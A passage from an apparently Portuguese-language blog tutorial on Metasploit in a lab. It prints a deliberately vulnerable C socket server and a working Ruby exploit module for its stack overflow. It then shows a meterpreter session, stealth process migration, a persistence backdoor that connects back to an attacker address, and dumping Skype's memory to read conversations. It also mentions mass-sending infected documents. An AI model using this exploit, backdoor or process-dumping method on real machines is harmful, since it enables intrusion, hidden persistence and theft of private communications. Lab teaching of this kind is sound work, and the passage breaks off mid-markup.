de execução:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: 85%;"&gt;&lt;span style="font-weight: bold;"&gt;root@bt:~# chmod +x Virtualbox-3.2.8-64453-Linux_x86.run&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Em seguida, basta executá-lo:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: 85%; font-weight: bold;"&gt;root@bt:~# ./Virtualbox-3.2.8-64453-Linux_x86.run&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Digite "yes" todas as vezes que lhe for perguntado. Pronto, seu virtualbox já está instalado. Foi criado um atalho em:&lt;br /&gt;&lt;br /&gt;Menu Dragon --&amp;gt; System --&amp;gt; Oracle VM VirtualBox - Virtual Machine&lt;br /&gt;&lt;br /&gt;Resta apenas criar a máquina virtual com o Windows XP, na qual não explicarei neste artigo.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;3 - Software Skypeex.&lt;/span&gt;&lt;br /&gt;-----&amp;gt; Para baixar esta ferramenta, basta visitar o link abaixo e fazer o download. Explicarei nos próximos capitulos a sua utilização, não sejam apressados.&lt;br /&gt;&lt;br /&gt;Link: &lt;a href="http://csitraining.co.uk/skypex.aspx"&gt;http://csitraining.co.uk/skypex.aspx&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;4 - Programa vulneravel em linguagem C, compile em seu Windows e o execute. Segue o código:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://pastebin.com/raw.php?i=YhgSK5q2"&gt;http://pastebin.com/raw.php?i=YhgSK5q2&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #993300; font-size: 85%;"&gt;#include &lt;/span&gt;&lt;iostream.h&gt;&lt;span style="color: #993300; font-size: 85%;"&gt;&lt;br /&gt;#include &lt;/span&gt;&lt;winsock.h&gt;&lt;span style="color: #993300; font-size: 85%;"&gt;&lt;br /&gt;#include &lt;/span&gt;&lt;windows.h&gt;&lt;span style="color: #993300; font-size: 85%;"&gt;&lt;br /&gt;&lt;br /&gt;//load windows socket&lt;br /&gt;#pragma comment(lib, "wsock32.lib")&lt;br /&gt;&lt;br /&gt;//Define Return Messages&lt;br /&gt;#define SS_ERROR 1&lt;br /&gt;#define SS_OK 0&lt;br /&gt;&lt;br /&gt;void pr( char *str)&lt;br /&gt;{&lt;br /&gt;char buf[500]="";&lt;br /&gt;strcpy(buf,str);&lt;br /&gt;}&lt;br /&gt;void sError(char *str)&lt;br /&gt;{&lt;br /&gt;MessageBox (NULL, str, "socket Error" ,MB_OK);&lt;br /&gt;WSACleanup();&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;int main(int argc, char **argv)&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;WORD sockVersion;&lt;br /&gt;WSADATA wsaData;&lt;br /&gt;&lt;br /&gt;int rVal;&lt;br /&gt;char Message[5000]="";&lt;br /&gt;char buf[2000]="";&lt;br /&gt;&lt;br /&gt;u_short LocalPort;&lt;br /&gt;LocalPort = 200;&lt;br /&gt;&lt;br /&gt;//wsock32 initialized for usage&lt;br /&gt;sockVersion = MAKEWORD(1,1);&lt;br /&gt;WSAStartup(sockVersion, &amp;amp;wsaData);&lt;br /&gt;&lt;br /&gt;//create server socket&lt;br /&gt;SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0);&lt;br /&gt;&lt;br /&gt;if(serverSocket == INVALID_SOCKET)&lt;br /&gt;{&lt;br /&gt;sError("Failed socket()");&lt;br /&gt;return SS_ERROR;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;SOCKADDR_IN sin;&lt;br /&gt;sin.sin_family = PF_INET;&lt;br /&gt;sin.sin_port = htons(LocalPort);&lt;br /&gt;sin.sin_addr.s_addr = INADDR_ANY;&lt;br /&gt;&lt;br /&gt;//bind the socket&lt;br /&gt;rVal = bind(serverSocket, (LPSOCKADDR)&amp;amp;sin, sizeof(sin));&lt;br /&gt;if(rVal == SOCKET_ERROR)&lt;br /&gt;{&lt;br /&gt;sError("Failed bind()");&lt;br /&gt;WSACleanup();&lt;br /&gt;return SS_ERROR;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;//get socket to listen&lt;br /&gt;rVal = listen(serverSocket, 10);&lt;br /&gt;if(rVal == SOCKET_ERROR)&lt;br /&gt;{&lt;br /&gt;sError("Failed listen()");&lt;br /&gt;WSACleanup();&lt;br /&gt;return SS_ERROR;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;//wait for a client to connect&lt;br /&gt;SOCKET clientSocket;&lt;br /&gt;clientSocket = accept(serverSocket, NULL, NULL);&lt;br /&gt;if(clientSocket == INVALID_SOCKET)&lt;br /&gt;{&lt;br /&gt;sError("Failed accept()");&lt;br /&gt;WSACleanup();&lt;br /&gt;return SS_ERROR;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;int bytesRecv = SOCKET_ERROR;&lt;br /&gt;while( bytesRecv == SOCKET_ERROR )&lt;br /&gt;{&lt;br /&gt;//receive the data that is being sent by the client max limit to 5000 bytes.&lt;br /&gt;bytesRecv = recv( clientSocket, Message, 5000, 0 );&lt;br /&gt;&lt;br /&gt;if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET )&lt;br /&gt;{&lt;br /&gt;printf( "\nConnection Closed.\n");&lt;br /&gt;break;&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;//Pass the data received to the function pr&lt;br /&gt;pr(Message);&lt;br /&gt;&lt;br /&gt;//close client socket&lt;br /&gt;closesocket(clientSocket);&lt;br /&gt;//close server socket&lt;br /&gt;closesocket(serverSocket);&lt;br /&gt;&lt;br /&gt;WSACleanup();&lt;br /&gt;&lt;br /&gt;return SS_OK;&lt;br /&gt;}&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Não sabe compilar no windows? Procure por Dev-C++ ou LCC-Win32 no google que rápidinho você passará a saber! :)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;5 - E finalmente, 6 latinhas de cerveja.&lt;/span&gt;&lt;br /&gt;-----&amp;gt; Qualquer buteco de esquina você acha! :)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red; font-weight: bold;"&gt;Adicionando Exploit ao MSF&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Para adicionarmos um exploit ao metasploit, primeiramente devemos ter em mente as seguintes perguntas, para motivo de organização:&lt;br /&gt;&lt;br /&gt;O que estou adicionando? Para qual sistema operacional ele é útil? O que ele explora?&lt;br /&gt;&lt;br /&gt;Entendeu mais ou menos?&lt;br /&gt;&lt;br /&gt;Vou explicar. Vamos para o diretório padrão do msf, para isso digite:&lt;br /&gt;&lt;span style="font-size: 85%;"&gt;&lt;span style="font-weight: bold;"&gt;root@bt:~# cd /pentest/exploits/framework3/&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;root@bt:/pentest/exploits/framework3# ls&lt;/span&gt;&lt;br /&gt;HACKING documentation lib msfcli msfelfscan msfmachscan msfpescan msfweb test&lt;br /&gt;README erros.txt lista.txt msfconsole msfencode msfopcode msfrpc plugins tools&lt;br /&gt;data external modules msfd msfgui msfpayload msfrpcd scripts&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;root@bt:/pentest/exploits/framework3# &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Estamos no diretório padrão do msf (Na verdade o diretório padrão fica em /opt/metasploit3/msf3/, este diretório é apenas um link simbólico.).&lt;br /&gt;Agora entre no diretório modules:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: 85%; font-weight: bold;"&gt;root@bt:/pentest/exploits/framework3# cd modules/&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Agora em exploits. (O que estou adicionando?)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: 85%; font-weight: bold;"&gt;root@bt:/pentest/exploits/framework3/modules# cd exploits/&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Em windows. (Para qual sistema operacional ele é útil?)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: 85%; font-weight: bold;"&gt;root@bt:/pentest/exploits/framework3/modules/exploits# cd windows/&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;E por fim em misc. (O que ele explora?)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: 85%; font-weight: bold;"&gt;root@bt:/pentest/exploits/framework3/modules/exploits/windows# cd misc/&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Ok, agora vamos adicionar nosso exploit neste diretório que estamos. Vamos dar o nome de "exploit_stackoverflow.rb". A extensão ".rb" significa que o exploit foi desenvolvido na linguagem Ruby. Utilizarei o nano, mais utilize o editor de sua preferência.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: 85%; font-weight: bold;"&gt;root@bt:/pentest/exploits/framework3/modules/exploits/windows/misc# nano exploit_stackoverflow.rb&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Agora insira o exploit abaixo:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://pastebin.com/raw.php?i=H26uL5ih"&gt;http://pastebin.com/raw.php?i=H26uL5ih&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #cc6600; font-size: 85%;"&gt;#&lt;br /&gt;#&lt;br /&gt;# Custom metasploit exploit for vulnserver.c&lt;br /&gt;# Written by Peter Van Eeckhoutte&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;require 'msf/core'&lt;br /&gt;&lt;br /&gt;class Metasploit3 &amp;lt; info =" {})"&amp;gt; 'Custom vulnerable server stack overflow',&lt;br /&gt;'Description' =&amp;gt; %q{&lt;br /&gt;This module exploits a stack overflow in a&lt;br /&gt;custom vulnerable server.&lt;br /&gt;},&lt;br /&gt;'Author' =&amp;gt; [ 'Peter Van Eeckhoutte' ],&lt;br /&gt;'Version' =&amp;gt; '$Revision: 9999 $',&lt;br /&gt;'DefaultOptions' =&amp;gt;&lt;br /&gt;{&lt;br /&gt;'EXITFUNC' =&amp;gt; 'process',&lt;br /&gt;},&lt;br /&gt;'Payload' =&amp;gt;&lt;br /&gt;{&lt;br /&gt;'Space' =&amp;gt; 1400,&lt;br /&gt;'BadChars' =&amp;gt; "\x00\xff",&lt;br /&gt;},&lt;br /&gt;'Platform' =&amp;gt; 'win',&lt;br /&gt;&lt;br /&gt;'Targets' =&amp;gt;&lt;br /&gt;[&lt;br /&gt;['Windows XP SP3 En',&lt;br /&gt;{ 'Ret' =&amp;gt; 0x7c874413, 'Offset' =&amp;gt; 504 } ],&lt;br /&gt;['Windows 2003 Server R2 SP2',&lt;br /&gt;{ 'Ret' =&amp;gt; 0x71c02b67, 'Offset' =&amp;gt; 504 } ],&lt;br /&gt;],&lt;br /&gt;'DefaultTarget' =&amp;gt; 0,&lt;br /&gt;&lt;br /&gt;'Privileged' =&amp;gt; false&lt;br /&gt;))&lt;br /&gt;&lt;br /&gt;register_options(&lt;br /&gt;[&lt;br /&gt;Opt::RPORT(200)&lt;br /&gt;], self.class)&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;def exploit&lt;br /&gt;connect&lt;br /&gt;&lt;br /&gt;junk = make_nops(target['Offset'])&lt;br /&gt;sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded&lt;br /&gt;sock.put(sploit)&lt;br /&gt;&lt;br /&gt;handler&lt;br /&gt;disconnect&lt;br /&gt;&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;end&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Créditos Exploit:&lt;span style="font-size: 100%;"&gt; &lt;/span&gt;&lt;/windows.h&gt;&lt;/winsock.h&gt;&lt;/iostream.h&gt;&lt;span style="color: black; font-size: 100%;"&gt;"Peter Van Eeckhoutte"&lt;/span&gt;&lt;br /&gt;&lt;iostream.h&gt;&lt;winsock.h&gt;&lt;windows.h&gt;&lt;br /&gt;Salve com "Ctrl + X", informe que quer salvar pressionando Y e ENTER.&lt;br /&gt;&lt;br /&gt;Ok, se ocorreu tudo certo aqui, basta abrirmos o msfconsole e ver nosso exploit recém adicionado.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: 85%; font-weight: bold;"&gt;root@bt:/pentest/exploits/framework3/modules/exploits/windows/misc# msfconsole&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Veja figura abaixo.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/TKkwzO3xSPI/AAAAAAAAAOc/NCh_fmkIC0Y/s1600/msfconsole1.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5524000074670098674" src="http://1.bp.blogspot.com/_fzuc26ZLs28/TKkwzO3xSPI/AAAAAAAAAOc/NCh_fmkIC0Y/s320/msfconsole1.png" style="cursor: pointer; display: block; height: 197px; margin: 0px auto 10px; text-align: center; width: 320px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Agora vamos procurar pelo exploit "exploit_stackoverflow", para isso digitamos o comando search. (Óbvio não?). Veja na figura abaixo.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_fzuc26ZLs28/TKkw-7hRkiI/AAAAAAAAAOk/t9ndaqc8A-0/s1600/msf_search.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5524000275633902114" src="http://4.bp.blogspot.com/_fzuc26ZLs28/TKkw-7hRkiI/AAAAAAAAAOk/t9ndaqc8A-0/s320/msf_search.png" style="cursor: pointer; display: block; height: 185px; margin: 0px auto 10px; text-align: center; width: 320px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red; font-weight: bold;"&gt;Explorando&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Na máquina windows, execute o programa vulnerável. Para checarmos se está funcionando direitinho, basta um simples scan usando o nmap em nosso alvo, procurando pela porta 200, que é a porta que o nosso programa vulnerável "escuta".&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_fzuc26ZLs28/TKkxQObqt-I/AAAAAAAAAOs/ziXIxf0YeI0/s1600/scan_nmap.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5524000572768434146" src="http://2.bp.blogspot.com/_fzuc26ZLs28/TKkxQObqt-I/AAAAAAAAAOs/ziXIxf0YeI0/s320/scan_nmap.png" style="cursor: pointer; display: block; height: 170px; margin: 0px auto 10px; text-align: center; width: 320px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Como pode ver acima, esta correndo tudo bem. Agora vamos usar o exploit que acabamos de adicionar para "ganharmos" acesso ao alvo.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_fzuc26ZLs28/TKkyh-FUYeI/AAAAAAAAAO0/nRWrlv1hDqw/s1600/exploit_target.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5524001977129001442" src="http://3.bp.blogspot.com/_fzuc26ZLs28/TKkyh-FUYeI/AAAAAAAAAO0/nRWrlv1hDqw/s320/exploit_target.png" style="cursor: pointer; display: block; height: 320px; margin: 0px auto 10px; text-align: center; width: 302px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Como podem ver, conseguimos explorar a vulnerabilidade do software e injetar as dll`s do meterpreter na memória RAM do nosso alvo.&lt;br /&gt;&lt;br /&gt;Experimente digitar "ipconfig" e verá o IP do micro em que estamos. Logo em seguida, digite "ps" e verá todos os processos atuais no alvo.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_fzuc26ZLs28/TKkytU-pRZI/AAAAAAAAAO8/oRPWo99r6R8/s1600/ipconfig_ps.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5524002172253586834" src="http://2.bp.blogspot.com/_fzuc26ZLs28/TKkytU-pRZI/AAAAAAAAAO8/oRPWo99r6R8/s320/ipconfig_ps.png" style="cursor: pointer; display: block; height: 320px; margin: 0px auto 10px; text-align: center; width: 291px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Procure sempre migrar para um processo estável, pois dependendo do método utilizado para a intrusão no mundo real, o usuário que está utilizando o micro alvo, pode perceber algum "travamento" no software e fechá-lo. Para isso basta usar o comando "migrate" com a ajuda do "ps" mostrado acima. Procure pelo PID associado ao processo explorer.exe, que neste caso é o 1080.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_fzuc26ZLs28/TKky1658_bI/AAAAAAAAAPE/KoTs1aLpgrQ/s1600/migrate_explorer.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5524002319873408434" src="http://3.bp.blogspot.com/_fzuc26ZLs28/TKky1658_bI/AAAAAAAAAPE/KoTs1aLpgrQ/s320/migrate_explorer.png" style="cursor: pointer; display: block; height: 102px; margin: 0px auto 10px; text-align: center; width: 320px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Obs.: Em cada micro o PID poderá sofrer alterações.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;DICA:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Durante a execução do exploit, podemos utilizar uma opção avançada para que faça a migração de processo automaticamente, nos poupando ter que digitar manualmente. Já imaginou se você enviar diversos arquivos pdfs, executáveis, arquivos xls/doc, etc, infectados para diversos alvos e tenha que migrar de processo em cada um? Não seria bom. Para isso podemos utilizar a opção "AutoRunScript", veja na figura abaixo.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_fzuc26ZLs28/TKkzEcl2MXI/AAAAAAAAAPM/wTfld68cNfE/s1600/autorunscript.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5524002569434050930" src="http://3.bp.blogspot.com/_fzuc26ZLs28/TKkzEcl2MXI/AAAAAAAAAPM/wTfld68cNfE/s320/autorunscript.png" style="cursor: pointer; display: block; height: 234px; margin: 0px auto 10px; text-align: center; width: 320px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Ok, vamos para a próxima parte!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red; font-weight: bold;"&gt;Backdoor&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Para que possamos continuar com o acesso ao alvo futuramente, precisamos instalar um backdoor, para isso vamos utilizar o script meterpreter "persistence", já comentei sobre ele em outro artigo.&lt;br /&gt;&lt;br /&gt;Passando o parâmetro -h, ele nos mostra as opções disponíveis deste script. Veja abaixo.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/TKkzM1ayqdI/AAAAAAAAAPU/tuP09BqKm94/s1600/run_persistence_help.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5524002713537522130" src="http://1.bp.blogspot.com/_fzuc26ZLs28/TKkzM1ayqdI/AAAAAAAAAPU/tuP09BqKm94/s320/run_persistence_help.png" style="cursor: pointer; display: block; height: 134px; margin: 0px auto 10px; text-align: center; width: 320px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Agora vamos utilizá-lo passando o parametro -X, veja na imagem e tente entender o que aconteceu olhando a saida do comando.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_fzuc26ZLs28/TKkzWV8KLCI/AAAAAAAAAPc/4xSC8drVcV0/s1600/persistence_X.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5524002876886232098" src="http://3.bp.blogspot.com/_fzuc26ZLs28/TKkzWV8KLCI/AAAAAAAAAPc/4xSC8drVcV0/s320/persistence_X.png" style="cursor: pointer; display: block; height: 56px; margin: 0px auto 10px; text-align: center; width: 320px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;O comando acima criará um arquivo executável na maquina destino, a opção -X serve para que o arquivo criado seja executado durante o boot da máquina destino, vejam onboot=true. Repare na saída do comando o endereço IP local da máquina do atacante e que ela escutará na porta 4444, que é a padrão, podemos alterar a porta padrão para outra que nos convenha usando a opção -p seguido do número da porta, exemplo, -p 5555.&lt;br /&gt;&lt;br /&gt;Veja que foi feito o upload do executável em C:\DOCUME~1\espreto\CONFIG~1\Temp\TcDWaEUCyFZC.vbs e foi identificado com o PID 728.&lt;br /&gt;&lt;br /&gt;E em seguida foi criado e instalado um arquivo autorun na seguinte chave do registro HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tubTxZTznuuT.&lt;br /&gt;&lt;br /&gt;Na ultima linha, ele nos da a opção para desfazer do "backdoor" que acabamos de criar, basta executar o comando conforme é mostrado. E é exatamente isso que vamos fazer agora, remover o backdoor recente instalado.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_fzuc26ZLs28/TKkzgtQdaUI/AAAAAAAAAPk/G0lF3arU7aU/s1600/remove_persistence.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5524003054944086338" src="http://3.bp.blogspot.com/_fzuc26ZLs28/TKkzgtQdaUI/AAAAAAAAAPk/G0lF3arU7aU/s320/remove_persistence.png" style="cursor: pointer; display: block; height: 42px; margin: 0px auto 10px; text-align: center; width: 320px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Mais Roberto, você nem mostrou como funciona na prática este backdoor!! Calma, basta acessar o outro artigo do VoL para ver como fazer isso.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.vivaolinux.com.br/artigo/Metasploit-Exploitation/?pagina=6"&gt;http://www.vivaolinux.com.br/artigo/Metasploit-Exploitation/?pagina=6&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Agora, vamos imaginar a seguinte situação: Acabamos de executar o script "persistence" usando a opção -X do micro com IP 192.168.1.181,certo? E se eu quiser conectar ao alvo de outro IP? Digamos que do IP 172.16.10.10? Bom, lembra do parâmetro -h? Utilize-o para visualizar novamente os parâmetros. Veja a imagem abaixo.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_fzuc26ZLs28/TKkz4TvFcHI/AAAAAAAAAPs/FsrDPYjMN-s/s1600/persistence_advanced.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5524003460410077298" src="http://2.bp.blogspot.com/_fzuc26ZLs28/TKkz4TvFcHI/AAAAAAAAAPs/FsrDPYjMN-s/s320/persistence_advanced.png" style="cursor: pointer; display: block; height: 57px; margin: 0px auto 10px; text-align: center; width: 320px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Com a opção "-U" o nosso agente será executado quando o usuário fizer o logon.&lt;br /&gt;Parâmetro "-i 10" irá tentar a conexão com o IP especificado do atacante a cada 10 segundos, este valor pode ser alterado.&lt;br /&gt;Parâmetro "-p 3773" especifica em que porta do micro do atacante, o metasploit estará escutando, neste caso na porta 3773.&lt;br /&gt;E por último o parâmetro "-r 172.16.10.10" que especifica o IP que o atacante utiliza o metasploit conectar de volta.&lt;br /&gt;As linhas seguintes, seguem a mesma linha de raciocínio quando foi usado a opção "-X".&lt;br /&gt;&lt;br /&gt;Para usar o comando acima, basta alterar o IP 172.16.10.10 para o seu IP do micro (ou VM) executando o Backtrack/Metasploit.&lt;br /&gt;&lt;br /&gt;Ok, agora desconecte desta atual sessão no meterpreter usando o comando "exit -y" e vamos utilizar o multi/handler para conectarmos novamente em nosso alvo, só que agora utilizando nosso backdoor.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/TKk0EeycGkI/AAAAAAAAAP0/P6cgc2-UDBk/s1600/use_multi-handler.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5524003669535365698" src="http://1.bp.blogspot.com/_fzuc26ZLs28/TKk0EeycGkI/AAAAAAAAAP0/P6cgc2-UDBk/s320/use_multi-handler.png" style="cursor: pointer; display: block; height: 120px; margin: 0px auto 10px; text-align: center; width: 320px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;E voilà! Temos acesso a shell meterpreter novamente. Vamos supor que o usuário ao abrir o gerenciador de tarefas do windows, note o processo "wscript.exe" suspeito e o finaliza (Acho bem improvável, mais...)! Perdemos a conexão "momentâneamente" com o alvo. Sendo assim recomendo migrar para o processo "explorer.exe" para que também possamos utilizar outros scripts que só funcionam estando neste processo. Vamos utilizar o "AutoRunScript", para isso desconecte novamente do meterpreter, saia também do console do msf e execute o metasploit desde o inicio.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_fzuc26ZLs28/TKk0NnYlkOI/AAAAAAAAAP8/lS98YWj7HLc/s1600/use_multi-handler2.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5524003826461675746" src="http://3.bp.blogspot.com/_fzuc26ZLs28/TKk0NnYlkOI/AAAAAAAAAP8/lS98YWj7HLc/s320/use_multi-handler2.png" style="cursor: pointer; display: block; height: 238px; margin: 0px auto 10px; text-align: center; width: 320px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Veja a imagem acima e repare que realizou exatamente o que queriamos.&lt;br /&gt;&lt;br /&gt;Notaram que tivemos que digitar diversas vezes os comandos para conectarmos em nosso alvo? E se pudessemos automatizar isso digitando apenas uma vez? Ou apenas para fazer uma ou outra alteração?&lt;br /&gt;Então vamos utilizar um recurso chamado "resource file", basta abrir seu editor de texto favorito e digitar os comandos linha por linha, como abaixo.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/TKk0WOjJKxI/AAAAAAAAAQE/HW-XXUOcwk0/s1600/connect_back.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5524003974413888274" src="http://1.bp.blogspot.com/_fzuc26ZLs28/TKk0WOjJKxI/AAAAAAAAAQE/HW-XXUOcwk0/s320/connect_back.png" style="cursor: pointer; display: block; height: 119px; margin: 0px auto 10px; text-align: center; width: 278px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Depois de editado, basta executar da seguinte forma.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_fzuc26ZLs28/TKk0fhi7cJI/AAAAAAAAAQM/w-osKjRQE_k/s1600/resource_file.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5524004134132084882" src="http://1.bp.blogspot.com/_fzuc26ZLs28/TKk0fhi7cJI/AAAAAAAAAQM/w-osKjRQE_k/s320/resource_file.png" style="cursor: pointer; display: block; height: 229px; margin: 0px auto 10px; text-align: center; width: 320px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Tudo certo até aqui?&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red; font-weight: bold;"&gt;Process Dumping&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;De posse da shell meterpreter, vamos executar o script "process_dumping" em cima do processo do Skype. Vamos ver se a gente consegue achar algumas conversas?&lt;br /&gt;&lt;br /&gt;Ok, no console no meterpreter, digitamos "run process_dumping -n Skype.exe" ou "run process_dumping -p PID" onde você deverá trocar o PID para o valor correto. Não sabe como ver isso? Basta executar o comando "ps", veja abaixo.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_fzuc26ZLs28/TKk0uMr8XBI/AAAAAAAAAQU/cn8JQRljTp0/s1600/ps.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5524004386230787090" src="http://4.bp.blogspot.com/_fzuc26ZLs28/TKk0uMr8XBI/AAAAAAAAAQU/cn8JQRljTp0/s320/ps.jpg" style="cursor: pointer; display: block; height: 226px; margin: 0px auto 10px; text-align: center; width: 320px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Neste caso, usarei especificando o PID&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: 85%;"&gt;&lt;span style="font-weight: bold;"&gt;meterpreter&amp;gt; run process_dumping -p 976 &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_fzuc26ZLs28/TKk042RIGhI/AAAAAAAAAQc/D8_18n3lYN0/s1600/run_pid.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5524004569191291410" src="http://3.bp.blogspot.com/_fzuc26ZLs28/TKk042RIGhI/AAAAAAAAAQc/D8_18n3lYN0/s320/run_pid.jpg" style="cursor: pointer; display: block; height: 226px; margin: 0px auto 10px; text-align: center; width: 320px;" 